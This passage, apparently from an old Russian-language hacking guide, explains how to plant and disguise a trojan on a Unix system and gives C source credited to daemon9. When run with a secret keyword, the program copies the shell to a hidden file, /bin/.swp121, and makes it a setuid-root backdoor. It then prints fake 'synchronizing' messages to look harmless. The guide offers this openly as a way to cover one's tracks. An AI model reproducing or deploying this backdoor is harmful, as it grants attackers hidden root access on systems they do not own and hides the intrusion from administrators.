Это очень просто. Вместо сценария
оболочки используйте какойнибудь Скод, и это
поможет вам успешно замести следы. Вот как это
делается.
Убедитесь в том, что ваш троян работает
под корнем. Назовите его какнибудь безобидно и
хорошенько замаскируйте.
В ряде случаев небольшой троян может
быть создан в SUID оболочке при условии, что
соблюдены определенные параметры. Скод в
такой момент гораздо действеннее, нежели
оболочка, и помогает лучше прятать результаты.
/* daemon9@netcom.com */
#include
#define KEYWORD "industry3"
#define BUFFERSIZE 10
int main(argc, argv)
int argc;
char *argv[];{
int i=0;
if(argv[1]){ /* we've got an argument, is it
the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
/* Это уже троян */
system("cp /bin/csh /bin/.swp121");
system("chown root /bin/.swp121");
system("chmod 4755 /bin/.swp121");
}
}
/* Put your possibly system specific trojan
messages here */
/* Let's look like we're doing something...
*/
printf("Sychronizing bitmap image records.");
/* system("ls
alR / >& /dev/null >
/dev/null&"); */
for(;i<10;i++){
fprintf(stderr,".");
sleep(1);
}
printf("\nDone.\n");
return(0);
} /* End main */